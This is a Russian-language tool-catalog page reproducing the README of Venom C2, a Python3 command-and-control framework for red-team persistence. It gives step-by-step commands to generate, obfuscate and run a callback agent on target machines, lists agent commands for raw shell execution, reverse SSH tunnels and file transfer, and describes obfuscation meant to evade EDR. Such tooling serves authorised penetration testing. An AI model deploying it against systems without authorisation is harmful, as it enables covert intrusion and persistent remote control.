Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
venom — Venom C2 — это не имеющая зависимостей платформа Command & Control на Python3 для персистентности redteam. | Kitploit
Инструменты/GitHubGitHub/boku7/venom
Инструменты шифрования/дешифрованияГенерация полезной нагрузкиМеханизмы персистентностиЛатеральное перемещениеШелл-кодПост-эксплуатацияКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubboku7/venom

venom

Venom C2 — это не имеющая зависимостей платформа Command & Control на Python3 для персистентности redteam.

436759 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Venom C2

Venom C2 — это независимый от зависимостей фреймворк Command & Control на Python3 для обеспечения постоянства на этапе redteam, созданный для работы в системах без установки пакетов. Он включает сервер команды на Flask, операторский GUI на Electron и однострочный агент на Python, который обменивается данными по HTTP/HTTPS с использованием настраиваемых AES-зашифрованных JSON-сообщений. Используйте его для выполнения команд, управления файлами, поддержания доступа и создания обратных SSH-туннелей с скомпрометированных систем.

Предыстория

При повышении сетевых привилегий мы сталкивались со многими производственными системами, работающими на экзотических дистрибутивах и архитектурах. Мы хотели настроить постоянство, но наш арсенал инструментов и техник не работал. Кроме того, на некоторых целевых системах работал EDR.

Это были производственные системы, поэтому мы не хотели устанавливать пакеты. Нам требовался C2-агент, который работал бы без зависимостей. На системах был установлен Python3, поэтому я создал Venom C2 прямо в ходе задания: независимый от зависимостей C2-агент на Python3, который просто работает.

Мы не хотели использовать готовые C2-агенты из-за риска, что они могут быть обнаружены синей командой. Уникальный код — король для обхода современных EDR

Поскольку систем было много, мы автоматизировали уникальную обфускацию, именование, размещение в файловой системе, различные сетевые домены обратного вызова и уникальные пути сетевых запросов для каждого агента.

Я назвал его Venom, потому что мой сын обожает злодея Венома из Человека-паука. К тому же Python — змея, а у крутых змей есть яд (venom), так что название подошло идеально.

Будущее Venom C2

Его нет.

Это был всего лишь разовый проект C2, который я сделал в ходе задания. На разработку потребовалось около 2 дней, чтобы сделать его стабильным и надежным в целевой среде. Он выполнил свою задачу, обеспечив нам постоянство в сети на оставшиеся 6 недель задания. У меня нет планов продолжать разработку или использовать этот проект, поэтому я решил, что его можно выложить в открытый доступ.

Иначе он просто канул бы в devNULL...

devnull

Компоненты и возможности Venom C2

Сервер

  • Python3 Flask
  • Сервер команды, поддерживающий нескольких операторов
  • Сохраняет историю команд
  • Скрипт для настройки агентов
  • Скрипт для обфускации агентов
  • Управляет подключениями агентов
  • API для общения с клиентом GUI
  • Пользовательские профили со случайным выбором из больших массивов:
    • Имен параметров C2-сообщений
    • Случайных заголовков
    • Случайных атрибутов JSON с масштабируемыми типами значений

Клиент GUI

  • Electron
  • Работает на Linux, macOS, Windows
  • GUI — урезанная версия GUI от Loki

Агент

  • Python3 без зависимостей
  • Сообщения шифруются с помощью настраиваемых ключей AES
  • Все сообщения отправляются как JSON POST-запросы
  • Пользовательские профили со случайным выбором из больших массивов:
    • Базовых URI-путей (полезно для настройки маршрутизации обратного прокси)
    • Нескольких URI-путей для каждой функции агента
    • Имен параметров C2-сообщений
    • User-Agent
    • Случайных заголовков
    • Случайных атрибутов JSON с масштабируемыми типами значений

Команды агента

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Показать это меню справки
ls       : Вывести содержимое каталога
pwd      : Показать текущую рабочую директорию
cd       : Сменить директорию
cat      : Показать содержимое файла
mv       : Переместить/переименовать файлы или каталоги
cp       : Скопировать файлы или каталоги
mkdir    : Создать каталог
rmdir    : Удалить пустой каталог
write    : Записать содержимое в файл
chmod    : Изменить права доступа к файлу
rm       : Удалить файлы
shell    : Выполнить сырую команду оболочки
sleep    : Установить режим сна агента с опциональным джиттером
sshrev   : Создать обратный SSH-туннель
kill     : Завершить процесс агента
upload   : Загрузить файл с вашего локального компьютера оператора на удаленный компьютер агента
download : Скачать файл с удаленного компьютера агента на локальный компьютер оператора

Быстрый старт

1. Получите код на сервер

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. Установите зависимости сервера (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. Запустите сервер

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • При первом запуске генерируются имя пользователя и пароль администратора, которые выводятся в консоль. Скопируйте и сохраните их для аутентификации клиента на сервере.
  • Или задайте свои: python3 server.py --adduser <ИМЯ_ПОЛЬЗОВАТЕЛЯ> <ПАРОЛЬ>

4. Запустите клиент на рабочей станции

Запустите клиентский интерфейс на своей рабочей станции (не на сервере). Он должен иметь доступ к серверу.

root@kitploit:~
cd ../client
npm install
npm run start

Откройте клиент, перейдите в Config и введите учетные данные сервера.

Безопасность

Базовый путь API клиента сервера — /api/. Не открывайте /api/ в публичный интернет. Используйте VPN или строгие правила брандмауэра/обратного прокси, чтобы только доверенные клиенты могли получить к нему доступ.

5. Создайте агента

Из каталога server:

root@kitploit:~
python3 agent_create.py -H <хост_сервера> -P <порт_сервера> [-http]

6. Обфусцируйте агента

Из каталога server:

root@kitploit:~
python3 agent_obfuscate.py agents/<сгенерированный_файл_агента>.py

7. Запустите агента

Запускается на целевом компьютере, которым вы хотите управлять.

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
Скачать инструмент